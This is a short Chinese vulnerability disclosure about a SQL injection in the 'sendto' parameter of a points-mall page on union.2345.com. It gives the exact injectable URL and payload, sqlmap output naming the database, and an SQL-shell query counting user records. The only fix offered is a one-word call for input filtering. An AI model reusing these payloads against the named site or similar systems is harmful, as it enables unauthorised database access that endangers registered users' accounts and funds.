2345某分站SQL注入需过滤

2345某分站SQL注入

2345大联盟 union.2345.com



注入点

https://union.2345.com/jifen/mall/index.php?category=&priceArea=&sendto=1%27%20and%20%271%27=%271



参数sendto



MySQL字符型注入

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: sendto

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: category=&priceArea=&sendto=1' AND 5387=5387 AND 'UYEU'='UYEU

---

[13:17:55] [WARNING] changes made by tampering scripts are not included in shown payload content(s)

[13:17:55] [INFO] testing MySQL

[13:17:55] [INFO] confirming MySQL

[13:17:55] [INFO] the back-end DBMS is MySQL

web application technology: Apache 2.2.22

back-end DBMS: MySQL >= 5.0.0

[13:17:55] [INFO] fetching current database

[13:17:55] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[13:17:55] [INFO] retrieved:

[13:17:55] [WARNING] reflective value(s) found and filtering out

union2345

current database: 'union2345'



影响联盟注册用户，设计用户资金安全



web application technology: Apache 2.2.22

back-end DBMS: MySQL >= 5.0.0

[13:25:25] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER

sql-shell> select count(*) from all_user

[13:25:38] [INFO] fetching SQL SELECT statement query output: 'select count(*) from all_user'

[13:25:38] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[13:25:38] [INFO] retrieved:

[13:25:38] [WARNING] reflective value(s) found and filtering out

4513

select count(*) from all_user: '4513'

sql-shell>


 

解决方案：

过滤